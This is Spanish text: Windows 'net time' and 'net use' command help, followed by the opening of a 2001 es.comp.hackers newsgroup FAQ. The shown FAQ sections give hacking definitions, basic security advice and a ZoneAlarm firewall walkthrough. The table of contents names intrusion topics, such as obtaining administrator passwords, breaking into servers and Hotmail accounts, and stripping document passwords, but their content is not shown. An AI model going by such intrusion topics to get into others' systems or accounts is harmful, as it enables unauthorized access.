Sincroniza el reloj del equipo con el de otro equipo o dominio. Si se utiliza
sin la opción /set, muestra la hora de otro equipo o dominio.

net time [\\nombre_equipo | /domain[:nombre]] [/set]

Parámetro                                    Significado
===============================================================================
\\nombre_equipo       Es el nombre del servidor que desee comprobar o con el
                     que desee sincronizar las estaciones de trabajo.

/domain[:nombre]      Es el dominio con el que desea sincronizar la hora.

/set                  Sincroniza el reloj del equipo con el del equipo o
                     dominio especificado.


---

'Net Use'

Conecta o desconecta un equipo de un recurso compartido o muestra información acerca
de las conexiones del equipo. También controla las conexiones de red persistentes.

net use [nombre_dispositivo] [\\nombre_equipo\recurso_compartido[\volumen]]
[contraseña | *]] [/user:[nombre_dominio\]nombre_usuario] [[/delete] |
[/persistent:{yes | no}]]
           
net use nombre_dispositivo [/home[contraseña | *]] [/delete:{yes | no}]
           
net use [/persistent:{yes | no}]


Parámetro                                          Significado
============================================================================

ninguno                 Escriba net use sin parámetros para obtener una
                       lista de las conexiones de red.

nombre_dispositivo      Asigna un nombre para la conexión al recurso o
                       especifica el dispositivo que se va a desconectar.
                       Hay dos tipos de nombres de dispositivos: unidades de
                       disco(D a Z) e impresoras (LPT1 a LPT3). Escriba un
                       asterisco en lugar de un nombre específico de
                       dispositivo para asignar el siguiente nombre de
                       dispositivo disponible.

\\nombre_equipo\recurso_compartido   Es el nombre del servidor y del recurso
                                    compartido.
                                    Si el nombre de equipo contiene caracteres
                                    en blanco, escriba la barra invertida
                                    doble (\\) y el nombre entre comillas (" ").
                                    El nombre de equipo puede tener entre 1 y
                                    15 caracteres.

\volumen                     Especifica un volumen NetWare del servidor.
                            Para poder conectarse con servidores NetWare debe
                            tener instalado y estar ejecutando el Servicio de
                            cliente para NetWare (Windows NT Workstation) o el
                            Servicio de puerta de enlace o gateway para NetWare
                            (WinNT Server).

contraseña                   Es la contraseña necesaria para tener acceso al
                            recurso compartido.

*                            Pide por la contraseña. Los caracteres no se muestran
                            en pantalla a medida que los escribe.

/user                        Especifica un nombre de usuario diferente con el que
                            se realiza la conexión.

nombre_dominio               Especifica otro dominio. Por ejemplo,
                            net use d: \\servidor\recurso_compartido /user:admin\mario
                            conecta el usuario mario de la misma forma que si la
                            conexión se realizara desde el dominio administrador.
                            Si se omite el dominio, se usará aquél en el que tenga
                            lugar la conexión actual.

nombre_usuario               Especifica el nombre de usuario con el que se iniciará
                            la sesión.

/home                        Conecta un usuario con su directorio particular.

/delete                      Cancela la conexión de red especificada. Si el usuario
                            especifica la conexión mediante un asterisco se cancelarán
                            todas las conexiones de red.

/persistent                  Controla el uso de conexiones de red persistentes. El valor
                            predeterminado es la última configuración utilizada. Las
                            conexiones sin dispositivos no son persistentes.

Yes                          Guarda todas las conexiones tal como se realizaron y las
                            restaura en el siguiente inicio de sesión.

No                           No guarda la conexión en curso ni las siguientes. Las
                            existentes se restaurarán en el siguiente inicio de sesión.
                            Use el modificador /delete para eliminar conexiones
                            persistentes.

Ejemplos:
---------

- Para asignar el nombre de dispositivo de unidad de disco   net use e: \\financiero\cartas
 E: al directorio compartido CARTAS del servidor
 \\FINANCIERO

- Para asignar el nombre de dispositivo de unidad de disco     net use m:
 M: al directorio MARÍA dentro del volumen CARTAS            \\financiero\cartas\maría
 del servidor NetWare FINANCIERO

- Para asignar el nombre de dispositivo LPT1 a la cola de      net use lpt1:
 la impresora compartida LÁSER2 del servidor                 \\contabilidad\láser2
 \\CONTABILIDAD
 
- Para desconectarse de la cola de impresora LPT1             net use lpt1: /delete

- Para asignar el nombre de dispositivo de unidad de disco    net use h:
 H: al directorio particular del usuario mario             \\contabilidad\usuarios /home
                                                             /user:mario

- Para asignar el nombre de dispositivo de unidad de disco     net use f: \\financiero\notas
 F: al directorio compartido NOTAS del servidor                       hctarcs /persistent:no
 \\FINANCIERO, que requiere la contraseña hctarcs, sin
 que la conexión sea persistente
 
- Para desconectarse del directorio \\FINANCIERO\NOTAS    net use f: \\financiero\notas /delete

- Para conectarse a un recurso compartido del servidor    net use k: "\\financiero2"\circulares  
 FINANCIERO2                                                              

#24
es.comp.hackers PUFes.comp.hackers PUF (Preguntas de Uso Frecuente)
V 0.9.9beta - Ultima actualización: 13 de Septiembre del 2001


Tabla de Contenidos
Sección 1: Administración de las PUF
1.0) Control de Cambios
1.1) ¿Por qué hacer las PUF de es.comp.hackers?
1.2) ¿Qué se cubre en esta lista de PUF?
1.3) ¿Quién es responsable por esta lista de PUF, y cómo se puede contribuir a
la misma?
|1.4) Agradecimientos y contribuciones
1.5) Envío de contribuciones
1.6) Declaración de responsabilidades
1.7) Derechos de copia
1.8) ¿Dónde encontrar las PUF?
1.9) ¿Cómo y dónde postear? Grupos de news adecuados para cada caso

Sección 2: Seguridad General de Sistemas
2.0) ¿Qué es seguridad?
2.1) ¿Cómo se define la seguridad física y lógica?
2.2) ¿Cómo puedo protegerme de los "hackers malintencionados" en forma rápida y
sencilla?
2.3) ¿Qué es hacking?
2.4) ¿Qué es cracking?
2.5) Otras definiciones
2.6) ¿Qué se necesita para ser un hacker?
2.7) ¿Qué es un pirata informático?

Sección 3: Firewalls (Cortafuegos)
3.0) ¿Qué es un firewall?
3.1) ¿Qué firewalls hay disponibles?
3.2) ¿Cómo arranco mi firewall al iniciar el sistema?
|3.3) ¿Cómo configuro mi firewall si no sé nada de redes?
3.4) ¿Cómo puedo probar mi firewall para saber si es seguro?
3.5) Mi firewall da una alarma. ¿Se han metido en mi ordenador?
3.6) Pero es que me están escaneando los puertos continuamente. ¿Para qué lo
hacen?
3.7) ¿Entonces me están atacando?
3.8) ¿Cómo sé si la alarma es debida a un ataque o no?
|3.9) Se ha confirmado mi sospecha y es un ataque. ¿Qué hago?

Sección 4: Antivirus
|4.0) ¿Qué es un virus?
4.1) ¿Hay antivirus para Linux?
4.2) ¿Cuál es la diferencia entre un firewall y un antivirus?

Sección 5: Anti-Troyanos
5.0) ¿Qué es un troyano?
5.1) En el punto 4.2 se menciona que los antivirus detectan solamente algunos
troyanos. ¿Qué pasa con los demás?
5.2) ¿Cuáles son los troyanos/backdoors mas comunes y más peligrosos?
5.3) ¿Cómo se meten usualmente los troyanos en un ordenador?
5.4) ¿Cómo se oculta un archivo dentro de otro?

Sección 6: Software espía (Spyware)
6.0) ¿Qué es el spyware?
6.1) ¿Cómo elimino el spyware?

Sección 7: Servicios
7.0) ¿De qué va eso de los servicios?
7.1) ¿Cómo sé qué servicios estoy corriendo?
7.2) ¿Debo utilizar telnet y FTP?
7.3) ¿Qué alternativa tengo?
7.4) Eso es muy bueno para la consola. ¿Cómo puedo ver remotamente el entorno
gráfico?

Sección 8: Conexión por red
8.0) ¿Cómo puedo ver la IP de otra persona?
8.1) ¿Cómo puedo averiguar recursos compartidos, usuarios y grupos de máquinas
Windows?

Sección 9: Hacking
9.0) ¿Cómo puedo obtener la clave del Administrador en un Windows NT/2000?
|9.1) ¿Cómo puedo violar la seguridad de un servidor NOVELL?
|9.2) ¿Cómo puedo violar la seguridad de un servidor UNIX/Linux?
9.3) ¿Cómo y dónde debe reportarse un incidente serio de seguridad?

Sección 10: Documentación sobre estándares de red
10.0) ¿Qué es un RFC?

Sección 11: Web
11.0) ¿Cómo puedo bajar una web completa para verla offline?
11.1) ¿Cómo puedo postear al grupo desde web?
11.2) ¿Cómo puedo navegar sin que se vea mi IP?
11.3) ¿Dónde consigo una lista de proxies?
|11.4) ¿Cómo puedo saber si un servidor web es Apache, IIS u otro?

Sección 12: Correo electrónico
12.0) ¿Es seguro el correo electrónico?
12.1) ¿Cómo mejoro la seguridad del correo electrónico?
12.2) ¿Cómo puedo enviar un mail anónimo?
12.3) ¿Cómo utilizo telnet para enviar un mail?
|12.4) ¿Cómo puedo jakear hotmail?

Sección 13: Grupos de Noticias
13.0) ¿Dónde consigo una lista de servidores de grupos de noticias que pueda
utilizar?
13.1) ¿Puedo postear utilizando telnet?

Sección 14: Passwords
14.0) ¿Cómo elimino el password de mi documento de Microsoft Office?
14.1) ¿Cómo elimino el password de un PDF?
14.2) ¿Cómo elimino el password de un archivo .zip?

Sección 15: Criptografía
15.0) ¿Qué es la criptografía?
15.1) ¿Qué programas tengo para cifrar mis documentos?

Sección 16: Esteganografía
16.0) ¿Qué es la esteganografía?
16.1) ¿Qué programas tengo para ocultar información?

Sección 17: Aplicaciones más comunes
17.0) ¿Qué es y para qué sirve el Norton Ghost?

Sección 18: Referencias y Bibliografía
18.0) Referencias en Internet
|18.1) Bibliografía
18.2) Breve reseña de arquitecturas y sistemas operativos







Sección 1: Administración de las PUF

1.0) Control de cambios
Los cambios a la presente versión de las PUF se indican con un signo "|" en la
Tabla de Contenidos, delante de las secciones que sufrieron modificaciones o
agregados.
Adicionalmente, en la versión en HTML de las PUF, los cambios aparecen en
negrita en la Tabla de Contenidos.

1.1) ¿Por qué hacer las PUF de es.comp.hackers?
Hay varias preguntas que aparecen varias veces por semana en el grupo, y como un
esfuerzo tendiente a asistir a aquellos que recién se inician en él, así como
para brindar algunos conocimientos básicos comunes a sus miembros, he decidido
armar la siguiente lista de PUF.
Espero que esta lista de PUF no conteste solamente preguntas específicas, sino
que facilite el acceso a todo tipo de información y recursos de hacking y
seguridad para todos los interesados.

1.2) ¿Qué se cubre en esta lista de PUF?
Específicamente hacking y seguridad sobre sistemas Linux y MS Windows.
No se cubren preguntas relacionadas con la instalación de estos sistemas,
excepto donde tengan relevancia en la configuración de los mismos desde el punto
de vista de seguridad.
Se cubren preguntas sobre productos de terceros cuando tengan relevancia en el
grupo.

1.3) ¿Quién es responsable por esta lista de PUF, y cómo se puede contribuir a
la misma?
Si alguien desea responsabilizarse por la lista es bienvenido, yo no tengo el
tiempo suficiente para mantenerla en forma regular.
Las contribuciones son bienvenidas, en particular sugerencias de temas que
cualquiera suponga que deben estar cubiertos.

1.4) Agradecimientos y contribuciones
Esta lista de PUF le debe un agradecimiento en primer lugar a los usuarios de
es.comp.hackers, y a las discusiones que se realizan en el grupo.
Creditos por las FAQ originales: Criptero, Pablo LGZ, Vortice, Madelaine, el
forense, Lasparri, pp1pp, speedfire, nexux0, zer0, sergei, kr0kus, anonymous,
Drizzt... y con posterioridad muchos otros del grupo.
Un agradecimiento especial a Dudaiev por indicarme dónde encontrar las FAQ
originales.
Agradecimientos a Seldon, unikoke, K@te M@te, Coya, Mezoberrazan, Fito.01,
Tracker, T.L., Darkwave, Lokutus, Voix, sergey lopez ruiz, isopreno y
Nekromancer, entre otros.

1.5) Envío de contribuciones
En principio, y hasta que alguien quiera responsabilizarse por la lista de PUF,
las contribuciones deberán hacerse como respuestas al post de la lista en si.

1.6) Declaración de responsabilidades
Esta lista de PUF se provee en forma gratuita, y sin ninguna garantía. No se
acepta ninguna responsabilidad por el mal uso del material contenido en la
lista.
Es muy probable que existan errores en esta lista de PUF, en particular en sus
primeras versiones, y la responsabilidad por la verficación de la información
provista es responsabilidad del usuario final.

1.7) Derechos de copia
Se permite la reproducción electrónica o por cualquier otro medio en cualquier
sistema, en tanto que se reproduzca en su totalidad, sin modificar, y con esta
nota de derechos de copia intacta.
Se permite su uso comercial, sin embargo es preferible que se consulte en
es.comp.hackers sobre este evento antes de su publicación.

1.8) ¿Dónde encontrar las PUF?
Las PUF se postean en forma regular en es.comp.hackers (la intención es
postearlas en forma semanal si no hay cambios importantes) y en las siguientes
webs:
  - http://kartrex.i.am
  - www.khermetik.org/es_hck/index.html
  - http://lecsiumsoft.com
  - http://eureka.ya.com/lecsium/tracker/texto/index.htm
  - [próximamente más webs]

Las FAQ anteriores pueden encontrarse en:
www.faqs.es.org/faqs/comp/hackers/comp-hackers.txt - Ahí está la FAQ 2000 (0.2)
www.geocities.com/SiliconValley/Lab/7379/faq.htm - Ahí está la antigua, la 0.1

1.9) ¿Cómo y dónde postear? Grupos de news adecuados para cada caso
El grupo de news es.comp.hackers está dedicado al hacking, phreacking y
cracking.
Si quieres hacer pruebas, el grupo indicado es es.pruebas
Si tienes alguna pregunta relacionada con la utilización o el funcionamiento de
los grupos es.* o las news en general, utiliza el grupo es.news.preguntas
Si tienes problemas con MS Windows el grupo adecuado es es.comp.os.ms-windows
Si quieres publicar un anuncio, el grupo indicado es uno de los grupos
es.alt.anuncios
Si deseas vender, comprar o intercambiar, el grupo indicado es
es.alt.anuncios.compra-venta
Si deseas publicar un archivo binario, el lugar indicado es alguno de los grupos
es.alt.binarios
La gente del grupo suele subir los binarios a es.binarios.misc
Puedes consultar un listado completo de los grupos es.* disponibles actualmente
en las páginas de Web de RedIRIS en las siguientes direcciones:
ftp://news.rediris.es/infonews/docs/news_config/newsgroups.es
http://news.rediris.es/infonews/es_groups.html
Si no encuentras un grupo cuya temática se ajusta específicamente a la de tu
mensaje, el lugar indicado para publicar tu mensaje es el grupo es.misc
Si pretendes crear un grupo cuya temática no se contempla en ninguno de los
grupos es.* existentes actualmente, plantea su creación en es.news.grupos
Recuerda también que en algunos casos es preferible contestar por correo
electrónico al autor de un artículo en vez de publicar su réplica en las news.
Si haces esto último, recuerda comprobar la dirección de respuesta del autor, ya
que en muchas ocasiones se modifica para evitar el SPAM.
Si decides enviar tu respuesta a las news, asegurate de que los grupos que
figuran en el encabezamiento "Newsgroups:" son los indicados para tu mensaje.
Borra aquellos grupos en los que tu mensaje esté fuera de tema. Si no lo haces
así, se considerará que haces crossposting, que está tan mal visto como el
Off-Topic.
Si decides publicar una respuesta en las news, borra las partes del mensaje
original que no son relevantes, incluye aquellas que sean necesarias para la
comprensión del mensaje y procura no reproducir el mensaje al que esta
contestando en su totalidad. De este modo facilitas la lectura de tu respuesta y
esta consumirá menos recursos en los servidores de news que la almacenen.







Sección 2: Seguridad General de Sistemas

2.0) ¿Qué es seguridad?
Seguridad, en pocas palabras, es asegurar la Confidencialidad, Integridad, y
Disponibilidad de sus sistemas y redes.
La seguridad se divide (groseramente) en seguridad física y seguridad lógica.

2.1) ¿Cómo se define la seguridad física y lógica?
Seguridad física:
Cuando se quiere tener un equipo seguro es importante considerar todos los
aspectos que están involucrados. Uno de ellos y sin duda, uno de los mas
importantes es la seguridad que se brinda en el entorno donde esta ubicado el
equipo.
El punto mas débil que tienen la mayoría de los equipos es su consola. Siempre
se asume que la persona que este ubicada en frente de la consola, es la persona
que administra el equipo o tiene pleno conocimiento del funcionamiento del
mismo. Desde la consola se pueden realizar tareas como:
* Apagar el equipo y dejar sin servicio a los usuarios
* En el caso de Linux reiniciar el equipo en un modo en particular (nivel de
ejecución 1)
* Insertar un diskette dentro del equipo y arrancar el mismo leyendo del
diskette, para acceder con otro sistema operativo
* Acceder a la configuración de hardware del equipo (BIOS)
Todos estos puntos tienen que controlarse y tratar de eliminar todos los
posibles puntos de entrada. Llegado el caso de que un intruso logre estar
personalmente en frente de la consola.
Estos puntos de entrada se pueden cerrar tomando las siguientes precauciones
(algunas aplican a servidores, otras a cualquier ordenador):
* Colocar el equipo en una sala cerrada bajo llave
* Eliminar cualquier periférico que no se utilice con frecuencia (como
diskettera, CDROM, etc.)
* Setear el arranque en la BIOS para permitirlo solamente desde el disco rígido
primario
* Proteger el BIOS del equipo con clave (tomar en cuenta que algunas BIOS
viejas tenían password universal)
* Eliminar puertos seriales y/o paralelos que no se utilicen
* Desconectar teclado, ratón y video si estos no son utilizados
Todos estos puntos son muy importantes, ya que algunos equipos Linux puede ser
reinicializados simplemente apretando Ctrl-Alt-Del y luego inicializados en modo
mantenimiento (donde el sistema no preguntará la clave del súper usuario). Esta
combinación de teclas puede anularse o configurarse para otro uso.
Otro tipo de ataque puede realizarse a través de la diskettera e incluso a
través de los puertos serie y paralelo.
Como siempre existen muchas formas de quebrar la seguridad de un sistema, nunca
se es lo suficiente precavido, pero es importante complicar al máximo la entrada
de un posible intruso.
Debe insistirse una vez mas que si un potencial intruso tiene acceso al hardware
no hay ningún tipo de seguridad lógica inviolable.

Seguridad lógica:
Es la configuración adecuada del sistema para evitar el acceso a los recursos y
configuración del mismo por parte de personas no autorizadas, ya sea a nivel
local o vía red.
Mucha gente considera que seguridad es solamente la seguridad lógica, pero este
concepto es erróneo.
Entre los puntos más importantes a tomar en cuenta para la seguridad lógica
tenemos (algunos aplican principalmente a servidores, otros a cualquier
ordenador):
* utilización de un sistema operativo relativamente seguro (NT, 2000, UNIX,
Linux, etc.)
* ELECCION DE BUENOS PASSWORDS (es el principal)
* activado del protector de pantalla con password cuando el equipo queda
desatendido y hacer logoff antes de retirse del mismo
* utilización de un buen firewall
* utilización de antivirus y detectores de troyanos
* utilización de dispositivos de identificación por biométrica (huellas
dactilares, escaneo de retina, reconocimiento de voz, etc.)

NO EXISTE EL ORDENADOR 100% SEGURO, salvo que se encuentre completamente
aislado, tanto físicamente como vía red. Los ordenadores de la NSA de USA con
nivel de seguridad C2 según estándares, son simples sistemas UNIX en un cuarto
cerrado, sin conexión a red.

2.2) ¿Cómo puedo protegerme de los hackers en forma rápida y sencilla?
En pocas palabras:
1. Instale y mantenga actualizado un buen antivirus.
2. Instale y configure adecuadamente un buen firewall (cortafuegos).
3. Instalar todos los parches de seguridad para su sistema operativo.
4. Cerrar todos los servicios, excepto los imprescindibles. No dejar ninguno que
no se utilice 'por si acaso': pueden ser la puerta de entrada de un intruso.
5. Si accede su ordenador en forma remota, reemplace telnet y FTP por
equivalentes seguros (no existe equivalente seguro de FTP, pero puede utilizarse
scp, uno de los componentes de SSH, cuando deban trasferirse archivos
importantes entre dos ordenadores).
Si accede a su ordenador por medio de telnet, cámbielo por SSH. El motivo es que
los datos, por telnet, van en texto plano (contraseñas incluídas), mientras que
en SSH (secure shell) todos los datos van cifrados.

Haciendo estas cosas, la mayor parte de sus problemas estarán cubiertos.

2.3) ¿Qué es hacking?
Hacking es la búsqueda permanente de conocimientos en todo lo relacionado con
sistemas informáticos, sus mecanismos de seguridad, las vulnerabilidades de los
mismos, la forma de aprovechar estas vulnerabilidades y los mecanismos para
protegerse de aquellos que saben hacerlo.
NOTA: esta es una de las múltiples definiciones del término que pueden
encontrarse en Internet. Consultar el Jargon File, por ejemplo en
www.fwi.uva.nl/~mes/jargon/ o buscar "Jargon File" con cualquier buscador.

2.4) ¿Qué es cracking?
Tiene dos definiciones, según se hable de seguridad informática o de crackeo de
programas.
En el caso de seguridad informática es el permanente intento de violación de
seguridad de los sistemas informáticos, con fines justificados o no.
En el caso de crackeo de programas la definición es la de creador de cracks,
literalmente romper, que son programitas destinados a la desprotección de
programas comerciales para que puedan ser usados sin límite (y gratis ;)
NOTA: estas son algunas de las múltiples definiciones de los término que pueden
encontrarse en Internet. Consultar el Jargon File, por ejemplo en
www.fwi.uva.nl/~mes/jargon/ o buscar "Jargon File" con cualquier buscador.

2.5) Otras definiciones
Wanabies - los que quieren ser, los futuros hackers, aunque por ahora no tienen
ni idea.
Newbies - hackers en camino, considerados 'novatos', pero con amplios
conocimientos ya.
Script kiddies - son los que entran en algún sitio utilizando herramientas
creadas por otros que malamente saben usar y que no saben cómo funcionan.
También se dedican a realizar ataques DoS (Denial of Service), popularmente
conocidos como nukes, a usuarios de IRC.
Lamers - los que se aprovechan del trabajo de los demás en su beneficio, sin
crear nada ellos y sin darles el reconocimiento que merecen. Los lamers son los
más repudiados por toda la comunidad underground. El término deriva de lusers,
que a su vez deriva de looser user (usuario perdedor, literalmente). Hay que
tener en cuenta el especial significado de ganador y perdedor en la cultura
anglosajona: los ganadores son los triunfadores en la vida, los perdedores el
resto.
Luego, también están otros que no son de hack, pero están muy relacionados:
coders, virii makers, etc.

2.6) ¿Qué se necesita para ser un hacker?
Ante todo MUCHAS ganas de aprender.
Un buen conocimiento del idioma inglés ayuda bastante, ya que, desgraciadamente,
es poca la documentación de hacking que ha sido traducida al español.
Es conveniente tener montada una LAN para poder hacer pruebas, como mínimo 2
ordenadores conectados con cable cruzado. Los ordenadores de la LAN deben tener
instalada una variedad de sistemas operativos que dependerán de las pruebas que
deseemos realizar, aunque tomando en cuenta la distribución de los sistemas
operativos a nivel mundial es conveniente que uno de ellos tenga Microsoft
Windows NT 4 + SP6a y otro alguna distribución de Linux o UNIX. A medida que
Microsoft Windows 2000 gane en popularidad será necesario contar con un
ordenador que lo tenga instalado.
Si contamos con ordenadores lo suficiente potentes podemos instalar sistemas
operativos adicionales en máquinas virtuales (por ej. con el programa VMware, de
www.vmware.com).

Como esta pregunta aparece con DEMASIADA frecuencia en el foro, vale una
explicación más detallada.

Imagínate que voy a la consulta del médico, y le digo "Quiero que me enseñes a
ser médico", o me acerco al campeón mundial de karate y le digo "Quiero que me
enseñes en un momento todo el karate que sabes".

¿Crees que todos esos fines de semana que se han pasado muchos estudiando es de
coña?, ¿Que esperas que te digan?, si macho, apréndete estas palabras mágicas, y
ya está.

Si de todas formas quieres que te expliquemos, aquí tienes un guión básico:

1 - Informática básica. Aprende conceptos acerca de cómo funciona un ordenador,
qué es la CPU, sistemas de numeración, álgebra booleana, conceptos de sistemas
operativos.

* Disco duro, particiones, ¿qué es una partición?
* Sistema operativo, ¿qué es?
* Gestión de memoria
* Gestión de acceso al disco
* Planificación de tareas
* Qué es un programa, código fuente, código objeto, compilar, linkar, ejecutable

2 - Aprende Inglés técnico, es muy importante. Métete en una academia si hace
falta.

3 - Aprende a usar bien el ordenador a nivel de usuario.

* Lectores de correo electrónico (y no es broma, hay gente que aunque los usa,
no sabe usarlos), prueba varios, el Eudora, por ejemplo
* Lectores de news, igual
* Varios navegadores, el Explorer, el Netscape, diversas herramientas
* Clientes de IRC, igual

Aprende qué son esas opciones que nunca usas, curiosea en las opciones, quizás
esta fase parezca una tontería, pero no lo es.

4 - Aprende a usar los recursos de Internet, por ejemplo los navegadores, hay
gente que aunque usa un navegador para buscar algo, no lo encuentra, porque en
realidad no sabe que palabras buscar. Con un poco de práctica, se aprende a ir
directamente al grano de lo que se busca.
La inmensa mayoría de las cosas que se preguntan aquí se encuentran en dos
patadas haciendo uso de un buscador. Cuando busques algo pregúntate: ¿Qué
palabras puede contener una página web que contenga el documento o programa que
busco?

Te pongo un ejemplo: Imagínate que alguien entra y pregunta por un firewall
gratuito y alguien le responde que se instale el cortafuegos "Freedom", pero no
dice donde está.

Entonces, el que pregunta, podría preguntar: ¿Y dónde me lo puedo bajar?
Pero en su lugar, lo que podría hacer, es ir a www.google.com y buscar
"Freedom".

Lógica y naturalmente, "Freedom" que significa libertad en inglés, es una
palabra muy corriente, le saldrán miles de páginas web, y no lo encontrará, por
eso es mejor acotar la búsqueda, usando más palabras, por ejemplo: "Freedom
firewall". Y siempre pensando, ¿Qué palabras contendrá la página web que busco?.

5 - Aprende HTML, a desarrollar páginas web, y una vez que sepas, métete con
Java Script, mira los scripts desarrollados por otros para ver como funcionan.
Al aprender Java Script, aprenderás algunos conceptos básicos de la
programación, las estructuras de control, bucles for, if, etc.

6 - Aprende algún lenguaje de programación, podría ser Visual Basic, aunque,
quizá en mi opinión, sería más interesante aprender algún lenguaje orientado a
consola, como Quick Basic. Aunque no lo sepas, probablemente lo tengas
instalado, abre una ventana al DOS y ejecuta QBasic. Una vez que te medio apañes
con QBasic, métete con Visual Basic.

7 - Puedes continuar con Java, Que no se te olvide C y C++. Tambien puedes
meterte con Python y Perl. Recuerda que la forma de aprender a programar no es
empollar los codos, sino programando. Haz tus propios programas, intenta meterte
en proyectos Open Source, quizás puedas aprender algo.

8 - Varios años más tarde, aprende bien acerca de protocolos de Internet, como
funcionan las cosas, Instálate también otros sistemas operativos, como Linux, o
BSD.

9 - A estas alturas, debes estar listo para usar sockets en C o C++, haz algo de
software sobre redes, algún servidor, aunque sea un minichat.

10 - Apúntate a listas de seguridad informática, y busca los tutoriales o libros
en la red que encuentres sobre seguridad informática. Naturalmente, en las
listas de seguridad informática no te va a enseñar sobre el tema, pero poco a
poco irás entrando en ese mundo, recordarás los avisos de vulnerabilidades
nuevas que aparecen y en muchas ocasiones te recordarán a vulnerabilidades
pasadas.

11 - Aunque no es imprescindible saber ensamblador, es conveniente saber al
menos que es, como se organiza un programa por dentro, que es lo que pasa cuando
se convierte en proceso, que es el stack, el head, el .TEXT, el código de
operación, o sea, puede ser divertido usar un emulador de un microentrenador
para prácticas de microprocesadores y aprender algo de ensamblador y hacer
algunas prácticas. No es porque pueda serte útil, si no porque te dá otra visión
más avanzada de lo que realmente hacen los programas, incluso cuando programas
en C, tienes otra visión diferente.
Por ejemplo, ¿sabes que las variables locales se crean en el stack y que por eso
se pierden cuando sales de la función?, si eso te lo dicen sin saber
ensamblador, pues puede que te suene a chino.

12 - Un truquillo para avanzar más rápido, aunque no es imprescindible, puedes
matricularte en la facultad de informática, con eso acortarás algo de tiempo. Si
no tienes nota suficiente, pues también puedes tirar de academias y cursillos.

Estudiando por tu propia cuenta, a veces te puedes atascar, combina los dos
métodos, avanza por tu cuenta y lo que te enseñen.

Con eso ya tienes tarea para rato, vuelve dentro de unos años.

2.7) ¿Qué es un pirata informático?
Por contra de lo que todo el mundo cree, "pirata" no es la traducción literal de
Hacker. En español se denomina "pirata informático" a los que se dedican a la
copia y distribución de software ilegal. Por lo tanto, los piratas informáticos
son aquellos que simplemente pinchan sobre el icono copiar disco, siendo el
programa y la grabadora los que hacen el resto del trabajo.







Sección 3: Firewalls (Cortafuegos)

3.0) ¿Qué es un firewall?
Un firewall es un programa o hardware diseñado para bloquear las conexiones no
deseadas a través de una red (por ejemplo Internet) mientras que permite las
conexiones autorizadas.

3.1) ¿Qué firewalls hay disponibles?
Para sistemas operativos MS Windows hay varias alternativas, dos de las más
comunes son:
ConSeal PC Firewall - es un programa comercial, puede adquirirse en
www.signal9.com
ZoneAlarm - es un programa (freeware para uso personal, shareware para otros
usos) que puede bajarse de la página oficial:
www.zonelabs.com
eSafeDesktop - programa gratuito para uso personal, en español, incluye
firewall, proxy, gestión de usuarios & políticas y antivirus (www.esafe.com).
Es importante destacar que el programa de firewall en si carece de utilidad si
no tiene reglas de firewalling que aplicar. Los programas suelen venir con un
juego de reglas que, sin ser de lo mejor, es mejor que nada.

Para sistemas Linux el mecanismo de firewalling viene incluído en el kernel, y
es necesario configurarlo u obtener reglas de firewalling ya hechas desde
Intenet.
Los mecanismos de configuración han variado con las diferentes versiones del
kernel, y son los siguientes (en cada nuevo kernel se mantuvo compatibilidad con
los mecanismos de las versiones anteriores):
kernels 2.0.x - ipfwadm (IP Firewall Admin)
kernels 2.2.x - ipchains (IP Chains)
kernels 2.4.x - iptables (Net Filter o IP Tables)
Pueden obtenerse reglas prefabricadas de firewalling para Linux del proyecto
Trinux, así como del Trinity OS. Ambos proyectos pueden buscarse en Freshmeat
(www.freshmeat.net).

Para los nuevos kernels 2.4.x el sistema de firewalling es completamente
distinto que para los anteriores. Ahora, es un sistema 'statefull', mientras que
antes era sin estado.
Esto, resumiendo, significa que, mientras los sin estado analizan cada paquete
independientemente, lo que permite colar paquetes si engañas al servidor
haciéndole creer que pertenecen a conexiones en puertos abiertos (esto lo hace
nmap, por ejemplo), mientras que los statefull analizan cada paquete sabiendo a
qué conexión pertenecen, por lo que este tipo de engaño ya no es posible.
iptables no es directamente compatible con ipchains, pero la conversión de
ipchains a iptables no es difícil. Por otra parte los kernels 2.4.x tienen un
módulo para soporte de ipchains que puede activarse durante la compilación, con
el fin de seguir utilizando los scripts de firewalling creados con ipchains.

3.2) ¿Cómo arranco mi firewall al iniciar el sistema?
En sistemas MS Windows crea un acceso directo al firewall en la carpeta Inicio
del Menú de Inicio de Windows, dentro de la carpeta Programas.

En sistemas Linux puedes arrancar el script de firewalling desde el
/etc/rc.d/rc.local, o bien crearle su propio link de arranque en la jerarquía
/etc/rc.d/rcX.d adecuada (X indica el nivel de ejecución).
El nivel de ejecución por defecto viene indicado en el archivo /etc/inittab, en
la línea donde pone 'initdefault', y suele ser 2, 3 ó 5.
En caso de utilizar una conexión telefónica el firewall no debe iniciarse con el
sistema, sino con la conexión a Internet. Para ello, se debe colocar el script
en el directorio /etc/ppp/ip-up/
En los casos de conexión continua, como ser ADSL y cablemódem, debe activarse el
firewall con el inicio del sistema.

3.3) ¿Cómo configuro mi firewall si no sé nada de redes?
Para aquellos que no entienden de redes, una posible estrategia, de máxima
seguridad, para configurar un firewall puede ser permitir sólo lo que quieres.
Ir abriendo aplicaciones una a una, ver qué servicios, protocolos y puertos
necesitan cada una de ellas y permitirlas.

Para que este método sea eficaz, es necesario estar seguro de que todo el flujo
de información hacia el exterior es legítimo, es decir, que tienes el sistema
limpio de troyanos y de spyware. Puedes usar programas shareware The Cleaner
(www.moosoft.com) y freeware como el Ad-aware (www.lavasoft.de).

Windows: Tomando como ejemplo el Zone Alarm

a. En el panel "Security" colocas el nivel de seguridad en Internet en high de
tal manera que solo circule lo permitido y que avise de todo.

b. En el panel "Alerts" activa las dos casillas "Log alerts to a text file" y
"Show the alert popup window" para que te de información sobre su actividad y la
grabe en un archivo log.

Con el botón Log properties --> Log file --> elige con qué periodicidad quieres
que refresque el archivo log. Zone Alarm hace copia de seguridad de los log's
anteriores con el nombre zalogaaaa.mm.dd.txt.

c. En el panel "Lock" activa "Show alert when Internet access is denied"

d. En el panel "Programs" --> advanced --> pestaña "Alerts and funcionality" -->
activa el botón "show alerts when Internet access is denied ", activa "deny
access if permission is ...."

e. En el panel "Programs" --> advanced --> pestaña "Access Permission" -->
activa "Always ask for permission", desactiva "Identify program by full path
name only", desactiva "Allow the program to pass through the lock"

f. Te conectas a Internet y arranca una a una las diferentes aplicaciones que
utilices. Cuando el firewall te muestre la alarma y petición, activa la casilla
"Remember ..." y permite el acceso. Desconecta.

g. Activa el panel "Programs" y tendrás allí todas las aplicaciones que has
lanzado. Para cada una de ellas pulsa "Options" y:

* Asegúrate de que está desactivado "Identify program by full path name only"

* --> Ports --> activa "Allow access ONLY for ...". Ahora permites el acceso a
